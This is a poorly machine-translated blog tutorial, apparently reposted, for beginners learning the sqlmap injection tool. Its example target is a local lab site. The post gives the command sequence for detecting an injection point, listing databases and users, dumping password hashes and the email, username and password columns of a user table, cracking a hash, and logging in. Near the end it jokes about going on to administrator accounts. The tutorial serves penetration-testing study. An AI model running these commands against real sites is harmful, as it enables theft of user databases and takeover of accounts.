SQL is really not safe.

Copyright NOTICE: This article for Bo Master original article, without Bo Master permission not reproduced.

Directory (?) [+]

Reprint Please specify source: http://blog.csdn.NET/zgyulongfei/article/details/41017493

Flying Dragon

This article is only dedicated to the study of penetration test sqlmap small white, Daniel please bypass.

>

>

For network security personnel, mastering the use of penetration tools is an essential skill. However, a no-teacher led by the small white at the beginning of the study, do not know how to start penetration learning, so this article is intended to help these small white primer.

Sqlmap is a very powerful open source SQL Automation injection tool that can be used to detect and exploit SQL injection vulnerabilities. It is developed by the Python language, so running requires a Python environment to be installed.

Now that this article is a basic tutorial, the following are the basics of how to use the tools.

This tutorial is for sqlmap specific application cases, if you need to know more sqlmap information can access the official http://sqlmap.org, or cloud Knowledge http://drops.wooyun.org/tips/401 and http:// drops.wooyun.org/tips/143.

Test environment: Locally built web site with SQL injection point http://192.168.1.150

Note: Sqlmap is only used to detect and exploit the SQL injection point, and does not scan the site for any vulnerabilities, use the Scan tool before using the SQL injection point.

Tutorial Start:

First, detection of the injection point is available

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"

Parameters:

-U: Specify the injection point URL

Results:

Injection results show:

(1) The injection parameter ID is get injection, the injection type has four kinds: boolean-based blind, error-based, stacked queries, inline query.

(2) Web Server System for Windows 2003 or XP

(3) Web application Technology: ASP. NET, Microsoft IIS 6.0

(4) database type: SQL Server 2000

There are several query statements in figure A, need user input [y/n], if you are too lazy to input or do not know how to input can let the program automatically input, just add a parameter, command as follows:

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--batch

Second, Bauku

A single command exposes all database names in the SQL Server command as follows:

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--dbs

Parameters:

There are two bars in front of the--dbs:dbs, please see clearly.

Results:

The results show that SQL Server contains 7 databases that are available.

Third, the database currently used by the Web

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--current-db

Iv. use of the Web database account

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--current-user

V. List all users of SQL Server

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--users

Vi. Database account and password

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"--passwords

Vii. listing tables in a database

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata--tables

Parameters:

-D: Specify the database name

--tables: List Tables

Results:

The results reflect a total of 34 tables.

Viii. listing fields in a table

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t UserB--columns

Parameters:

-D: Specify the database name

-T: Specify a table to list fields

--columns: Specify list fields

Results:

The results show that the UserB table contains 23 fields.

Nine, the Storm field content

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t userb-c "email, Username,userpassword "--dump

Parameters:

-C: Specify the field to be burst

--dump: Export the results

Results:

If the field is too much, it takes a lot of time. You can specify the export of a specific range of field content, with the following command:

[Plain]View PlainCopy

1. C:\python27\sqlmap>python sqlmap.py-u "http://192.168.1.150/products.asp?id=134"-D tourdata-t userb-c "email, Username,userpassword "--start 1--stop--dump

Parameters:

--start: Specifies the starting line

--stop: Specifies the end of the line

The meaning of this command is: Export the data contents of rows 1th through 10th in the field (Email,username,userpassword) in table UserB in database Tourdata.

The results are as follows:

X. Verification of results

One of the user information that you see through the results is:

Email:[email protected]

Username:1.asp

password:49ba59abbe56e057

By MD5 decryption, the original password to get the hash is: 123456

Get the account password we will test whether you can log in, the results are as follows:

Verify success!

Of course, we just get the ordinary member account to log in, you can also get the Administrator account to log in, behind the things to play it, hey!

Top

-

Step

SQL is really not safe.